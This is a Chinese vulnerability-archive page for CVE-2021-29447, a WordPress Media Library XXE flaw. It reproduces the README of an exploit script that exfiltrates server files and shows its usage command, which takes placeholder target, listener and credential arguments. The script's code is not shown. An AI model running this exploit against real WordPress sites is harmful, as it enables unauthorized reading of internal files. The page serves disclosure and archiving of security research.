关联漏洞
标题:WordPress 代码问题漏洞 (CVE-2021-29447)Description:WordPress是WordPress(Wordpress)基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 存在代码问题漏洞,攻击者可利用该漏洞在成功的XXE攻击中可以访问内部文件。
Description
Exploit WordPress Media Library XML External Entity Injection (XXE) to exfiltrate files.
介绍
# WordPress CVE-2021-29447 exploit
Exploit WordPress Media Library XML authenticated External Entity Injection (XXE) to exfiltrate files.
Patched in WordPress 5.7.1.
Required valid WordPress credentials to interact with Media Library.
## Usage
```
python3 wordpress-cve-2021-29447.py -l http://LOCAL_IP:PORT -r http://WORDPRESS_URL -u USERNAME -p PASSWORD
```
Script will ask for file path and return requested file.
## Credit
Inspired by [David Utón (M3n0sD0n4ld) ExploitDB](https://www.exploit-db.com/exploits/50304) script.
## Disclaimer
Usage of this for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.
## License
This script is released under the [MIT License](https://opensource.org/licenses/MIT).
文件快照
[4.0K] /data/pocs/d1f720d037b96fe7d75be7afe5cdf17aea8e740c
├── [1.0K] LICENSE.txt
├── [ 957] README.md
└── [7.5K] wordpress-cve-2021-29447.py
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →